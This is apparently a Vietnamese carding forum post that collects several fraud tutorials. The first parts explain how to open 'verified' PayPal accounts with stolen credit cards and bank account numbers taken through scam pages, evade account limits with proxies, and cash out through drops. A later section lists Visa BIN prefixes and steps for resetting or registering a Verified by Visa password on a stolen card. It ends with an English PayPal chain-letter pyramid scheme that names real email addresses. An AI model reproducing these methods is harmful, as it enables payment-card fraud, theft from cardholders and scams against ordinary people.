- nếu như info của card sai anh em có thể dùng phần mềm CC2Bank 1.3 hoặc những bản cũ hơn để check zipcode,tức là bịa một số gồm 5 chữ số,nó sẽ lôi ra cho anh em city,state của US,VD zipcode là : 12345 thì ở đây tớ check được city là Schenectady và state là new york (NY).
- Trong trường hợp trên ko phải là ko thể ship được,mà là có thể ship được nhưng rất hiếm,vì khi đó billing của thẻ sẽ ko chính xác.Tớ đã chơi card của UK và add vào pp với địa chỉ của US,trường hợp này tớ nói rồi là chỉ scam được tụi nào bán netphone hoặc software thôi .
- còn một vài điều nữa nhưng xin nhường lại cho các pro để anh em cùng học hỏi,thanks đã ủng hộ cho bài viết trên ( mặc dù tớ ko phải trực tiếp post )
Muốn không bị limit:
chỉ cần có IP ngon đúng với CC là ít khi bị limited ngay lập tức lắm..và cũng ít bị đòi cái số mà dưới chữ ký của tui nè....^^
Fake IP thì tìm cái nào ngon vào... hoặc kiếm Proxy SSL ý




Paypal tutorial
From : ccpowerforums.com
Dịch bởi : ketusa
============================
Well tôi quyết định viết tut này để chỉ các bạn cách làm thế nào để kiếm tiền và mua hàng bằng paypal . Tut này không dzành cho noobies vì vậy đừng đặt câu hỏi ở đây giống như " Paypal là gì , Tao có thể lấy Credit card ở đâu ? "

Tut này dzành cho tất cả những ai sử dụng scam page với full info . Và cũng cho những ai co bank acc online có money trong đó.
Trong khi một vài người trong chúng ta cash paypal bằng cách này hay cách khác , giống như sử dụng trộm tài khoản paypal hay tạo ra acc paypal cho chính mình bằng cách sử dụng cc chùa . Những phương pháp này sắp đặt những vấn đề cố hữu , giống như chủ nhân thực sự của acc paypal hoặc chargebacks trên cc mà bạn sử dụng . Kết quả là acc paypal sẽ bị limit và nảy sinh các vấn đề rắc rối vòng quanh , đặt biệt khi bạn gởi tiền vào tài khoản của chính mình hoặc một người bạn của bạn
Trong khi các bạn biết , không có gì tốt hơn là một verified PayPal account , như vậy thay cho việc trộm hãy tạo ra một cái cho chính mình.
Bạn cần gì để bắt đầu ?
- một cc chùa,
- một bank acc online với một ít money trong đó (Bank scam đươc hoặc bạn có thể reg cho minh một cái)
- một số điện thoại / phone number forwarding tới dịch vụ .
Những bank online thật sự thì họ không hề quan tâm đến ai là chủ nhân của các bank acc trong đó hay địa chỉ của họ ở đâu . Những gì bạn cần chỉ là bank name, routing number and account number (số và số hiệu tài khoản lộ trình). Bạn cũng có thể có hai số đó từ scam page hay bạn có thể login dzô banking online , đến phần history và kiểm tra . Hầu hết các ngân hàng đều cung cấp việc scan kiểm tra này. Click vào bức tranh của mục check và việc kiểm tra sẽ được thực hiện và bạn sẽ thấy phía dưới bên trái là routing (9digits) và acc number . Nên nhớ rằng các ngân hàng lớn sẽ có những serveral routing number vì vậy nếu bạn có một routing number không có nghĩa là nó cùng chỗ ngân hàng khác thuộc cùng một ngân hàng lớn . Bạn cũng có thể tìm thấy routing/acc number trên đỉnh ngay góc phải .
Bây giờ .
Bạn đi đến quyết định làm những gì bạn muốn. Cash out từ một bank acc mà bạn có đăng nhập tới hay những sản phẩm "card"
Tôi sẽ nói đến sự lựa chọn đầu tiên .
Nếu bạn muốn làm tiền , bạn có thể tạo một tài khoản paypal sử dụng tên và địa chỉ ngẫu nhiên (Mặt dù city + state + zipcode phải phù hợp với nhau . Có nghĩa là bạn không thể nào làm thành phố Newyork nằm trong bang California được . Sử dụng số điện thoại mà tôi đã đề cập ở trên và một cái good cc .
Bây giờ , bạn có thể add bank acc chỉ sử dụng bank name/routing/acc number. Paypal sẽ đặt những thông tin nhỏ này vào trong bank acc. Bạn sẽ được xác minh cho những điều đó và bạn đã hoàn thành . Bây giờ possesion trong tài khoản paypal đã được xác minh mà không có chủ nhân thức tế, bạn thì sử dụng giả mạo và không có charge backs. Và bạn gởi tiền từ bank acc đến những người bạn của bạn hoặc bất cứ ai mà bạn muốn. Từ khi bạn là chủ nhân cuả paypal acc , sẽ không có ai than phiền rằng cc hay acc của họ đã bị mất và acc paypal của bạn sẽ không bị limi .
Chú ý , không có gì để bảo đảm rằng bạn sẽ được kế vị acc paypal này hoặc nó sẽ không bị limit . Những lỗi thường xuyên nhất là PROXIES . Bạn phải đăng nhập vào acc paypal sau vài ngày sau khi tạo paypal của bạn. Vì vậy, phải chắc chắn là bạn có PROXIES thật sự tốt, khi đó acc của bạn sẽ không die. Một lỗi khác là LÒNG THAM và SỰ NGU NGỐC .Nếu bạn rút ra 1000K sau khi xác minh tài khoản của bạn , rõ ràng nó sẽ bị limit . Tôi khuyên bạn nên dưới 400$. So, cũng đôi khi địa chỉ của bạn thình lình xuất hiện như chưa được chứng thực. Đều này xảy ra khi bạn xáo trộn một cái gì đó - và paypal muốn xác nhận địa chỉ này .
Paypal sẽ gọi đến số điện thoại bạn cung cấp . nếu bạn làm mọi thứ ok . Một cuộc gọi tụ động sẽ đến chỗ chiếc điện thoại yêu dấu ở nhà bạn . Và bạn đơn giản là đưa cho paypal số Pin mà nó yêu cầu .........
Bây giờ nếu bạn muốn card stuff từ paypal. Seller chỉ bán cho những acc được xác minh. Vì vậy khi bạn tạo acc hãy dùng thông tin drop của bạn thay vì một thông tin ngẫu nhiên và theo giống thủ tục .
Done...Cộng với lại khi pay cho seller , bạn sử dụng bank acc thay vì cc và seller thích như vậy . khi đó họ sẽ ship stuff .
End !
Khi mình add card vào PP thì nó bắt phải "Enter Expanded Use Number". Vậy phải làm sao? MÌnh đâu có biết cái số này đâu. Hĩ hĩ Came back Tut verify paypal



Phương pháp vượt qua VerifyVisa
________________________________________
Tui là dân ngoại đạo của IT. Nhưng vì đam mê nên biết chút ít. Hôm nay rảnh rỗi nên viết bài này. Nếu anh em nào đã biết hoặc bài viết có lỗi gì mong thông cảm. Còn nếu anh em nào chưa biết thì hy vong sau khi đọc bài này sẽ áp dụng thành công. Nếu anh em nào khi order phải qua verify Visa thì hãy áp dụng các cách sau đây.
Thứ nhất:
Khi mình order ( Ví dụ Skype ) mà bị thằng verify visa hỏi pass thì đơn giản nhất là chọn active later. Đại đa số là thành công.
Thứ hai:
Khi áp dụng cách trên biết chắc chắn không thành công thì bạn chọn forgot pass. Đối với anh em có CC Full info thì không vấn đề gì, cứ điền info theo yêu cầu của nó đến lúc nó đòi tạo Pass mới thì tạo xong là okie. Nhưng vấn đề là anh em đâu phải ai cũng săn cc full info. Mình chỉ có cvv thôi thì làm thế nào? Không sao anh em cứ từ từ sẽ okie.
- Đầu tiên anh em tìm trong đống VISA của mình xem có những con VISA mà những số bắt đầu của CC Number như sau: 482001,474673,462406,413789,432374 (4323) 487309 446024,432388,432371,476165, 447972,412039,480613,430921.
(- Những con này thưc chất khi forgot pass nó ko đòi số SSN nên việc forgot pass khá dễ.
- Nếu check cc qua cc2bank,Đối với những ai ko có cc full thì gặp những bank như AOB, Capital, Suntrust, firstbank thì bỏ qua luôn. Đối với bank chase nó có một số đòi ssn,còn một số bank như: bank one thì ko cần ssn. Cũng tương tự đối với bank có đuôi F.C.U hay C.U . Dễ active nhất là Bank Well fargo.)
Tạm thời tui post từng này đầu Bank. Ai cần nhiều hơn thì liên hệ hoặc các bạn tự bỏ thời gian tim thêm.
- Sau khi tìm được như vậy bạn phải check chắc chắn con VISA đó live ( Check the nào? ở đâu thì hỏi Admin nhé? )
- Bạn dùng con visa đó để order khi bị hỏi Pass thì forgot pass và điền info theo yêu cầu của nó. Tui đảm bảo qua được nó đến 90%. ( Vì còn liên quan đến IP )
Thứ ba:
Cách này tui đảm bảo 100% qua được nếu CVV xịn và IP xịn. Bạn vẫn chọn cvv theo danh sách trên. Sau đó check cvv đảm bảo live. Tiếp theo bạn mở trình duyệt ra và vào link này: httxxps://usa.visa.com/personal/security/vbv/index.html
Tiếp theo bạn copy cc number của con visa bạn sẽ dùng để order vào cái Box Creditcard Number của trang web đó và submit. Nó sẽ chuyển bạn đến một trang yêu cầu bạn đăng ký và tạo pass bảo mật cho con VISA đó. Bạn cứ làm theo yêu cầu của nó từng bước một đến khi tạo pass thành công. Bạn nhớ cái pass đó sau đó quay lại dùng con cvv đó để order bình thường đến khi bạn bị hỏi pass thì điền cái pass vừa tạo vào và SUBMIT. ngồi chờ kết quả. Tôi đảm bảo nếu đã tạo được pass theo cách này thì order 100% qua được nó.
Đây là qua thằng VISA

Bài cũ của TTD
sao 1 số friend của tôi nó kêu bank sẽ call dể9 verified cái secure code này
Không qua mua qua PayPal nó mới gọi điện về


Dành cho các bạn học tập thêm về tiếng anh



Check Out This Awsome Opportunity To Making Fast Cash Using Your PayPal Account!

Hello Friend!

You may have seen an email floating around about making huge amounts of money through your PayPal account? Whether you have or not, I am sending you this to tell you that the scheme actually works, and PayPal have actually admitted it is legal!

Please read on and see what you think!

Before we go any further I would like you to know straight away that this will cost you 5 dollars and about 20 - 30 minutes of your time. If you are still interested, please read on.

I must say that the odds of making a decent amount of money incredibly fast, are excellent! Another excellent thing about this business plan is that it can be done by anyone, anywhere in the world and your total investment stays at just 5 dollars.

These are some of the emails and proof that I came across which finally made me decide that I wanted to try this:

“What an amazing plan. I followed the instructions just 3 weeks ago, and although I have not made 10 grand yet, I am already up to 9,135 dollars. I am absolutely shocked” - Steve Alda, Florida.

“Well what can I say? I sent out 40 emails like the plan said, then I just forgot about the whole thing. To be honest, I did not really think anything would come of it, but I checked my PayPal account a week later and there was over 7000 dollars in it!!! After 30 days I now have over 17,000 dollars to spend” - Lisa Raymond, New York.

“I was shocked when I saw how much money came flooding into my PayPal account. Within 3 weeks my account balance has ballooned to 14,445 dollars. At first I thought there had been some kind of error!” - Richard Welsh, Vancouver.

Well that is it. I hope that you decide to go ahead with it. If you decide that this is not for you, I wish you all the best in the future and please remember you can always pass it on even if you do not wish to do it yourself.

GETTING STARTED:
The very first thing you need to do is go to PayPal and sign up (if you do not already have a PayPal account). It takes two minutes and PayPal will deposit 5.00 dollars into your account (if you reside within North-America).

Here is the link to PayPal:
https://www.paypal.com/row/mrb/pal=45K8KBC37BRVJ

BE SURE TO SIGN UP FOR A PREMIER ACCOUNT! OR YOU WILL BE LIMITED TO 100 DOLLARS ONLY!!! YOU WILL MAKE MUCH MORE THAN THIS!!!

BE PREPARED TO GET EXCITED.... YOU WILL NOT BE DISAPPOINTED!!!

The second thing you need to do is send a 5.00 dollars payment from your PayPal account to the FIRST email address in the list below, along with a note saying /PLEASE ADD ME TO YOUR LIST/. Instructions on how to send a payment are under "SEND MONEY" at the PayPal site. It is very easy.

The current list is:

1. philip@philiplaw.co.uk

2. manfieldgrange@yahoo.co.uk

3. cindym@onetel.com

4. rimaalisha@hotmail.co.uk

5. izymoney4u@yahoo.com



The third and last thing you need to do is to copy and paste this entire e-mail into your own e-mail program. You then remove/delete the email address from the number 1 spot in the list above, move all the others up a space, and insert your own email address in the number 5 spot.
Then send the e-mail to as many people as you can!

N.B. You should see the email address of the person who sent you this at the number 5 slot. If it is any further up the list, someone has cheated and may only receive a few pounds.

You may also wish to advertise the content of this e-mail on message boards, auction sites etc. In no time at all, you should have reached the number 1 spot and the money will start coming into your PayPal account!

ALL I WOULD LIKE TO DO NOW IS WISH YOU GOOD LUCK!

Get the Dollar Ball rolling YOUR way!

PS.
IF YOU ARE STILL UNSURE OR EVEN IF YOU WOULD JUST LIKE TO KNOW HOW THIS WORKS PLEASE READ ON!

HERE IS HOW IT WORKS:
When you send out your email, your email-address will initially be at No 5 on the list. That is the best position that you can be in if you want to earn serious money. The response rate for this program is much higher than any typical email marketing campaign for a number of reasons, which are explained later on.

As long as you send out your emails to people whom are likely to be interested in this program, then on average you can expect a response of around 25%.

But let us be extremely conservative and assume that the average response rate is 12.5%! If you send out your 40 emails, you can expect at least 5 of those people to do exactly what you did (12.5% of 40 = 5 people). By the time your email address will have moved up to No 4 in the list, and this list will now have reached around 200 people (5 people x 40 emails = 200 people).

Out of those 200 people, you can expect at least 25 of them to participate (12.5% of 200 = 25 people) so you are now reaching around 1000 people (25 people x 40 emails = 1000) and you are now at No 3 on the list.

Out of those 1000 people, you can expect at least 125 of them to participate (12.5% of 1000 = 125 people) so you are now reaching around 5000 people (125 people x 40 emails = 5000) and you are now at No 2 on the list.

Out of those 5000 people, you can expect at least 625 of them to participate (12.5% of 5000 = 625 people) so you are now reaching around 25000 people (625 people x 40 emails = 25000) and you are now at No 1 on the list.

Out of 25000 people, you can expect at least 3125 of them to participate (12.5% of 25000 = 3125 people) so since you are at the No 1 spot you can expect to receive around about 15,625 dollars (3125 people x 5.00 dollars = 15,625 dollars).

So when your name hits the No 1 spot, it will be YOUR turn to collect the money.

Over the course of 30 days, this money will be sent to you by a few thousand people just like yourself, who are willing to invest 5 dollars and 20 minutes of their time to receive around 15,000 or more in cash.

The first payments will arrive within a few days and then they will continue at the rate of about 100 payments per day for about 30 days (obviously this will depend on how quickly you act and how quickly people take you up on this offer and then pass it on). After that time, the volume of payments begin to taper off as your email is removed from the No 1 position.

That is all you need to do! There will be around 15,000 dollars in 5 dollars payments waiting for you in your PayPal account within the next few weeks. 15,000 for just 30 minutes work! This is real money that you can spend on anything you wish! Just deposit it to your own bank account or spend it directly from your PayPal account!!!

It is just that easy!!! I think it is WORTH IT, agree?

Remember, the 12.5 % example above is assuming that 35 out of the 40 people you send your email to will do absolutely nothing except delete your email. However, if you follow the plan correctly and send your emails only to people who are likely to want to participate, you can expect a typical response-rate of around 25%. Hence, the 12.5% example is only given as a worst-case-scenario.

Additionally, the above example assumes that each participant will only send out 40 emails. Imagine what would happen if each participant sent out 1,000 emails instead of just 40! Believe me, many people will do this and much more!

Unlike many other MLM programs, this 5-LEVEL PROGRAM costs you only 5.00 dollars which is much more realistic and provides much, much faster results.

Only the first person on the list gets your 5 dollar gift, but everyone in the list will rise to that Number 1 position as thousands of emails are being sent out. No cheating can occur (do not be fooled by claims that this system can be cheated) as PayPal only allows one account per person. Because it is so easy, the response rate is VERY HIGH and VERY FAST - You know, Internet e-mail FAST, and you will start seeing dramatic results in less than one week!

JUST IN TIME FOR NEXT MONTHS BILLS!




MỌi người có gi ấn nút thanks hộ e.......e sẽ nhớ ơn tùng người một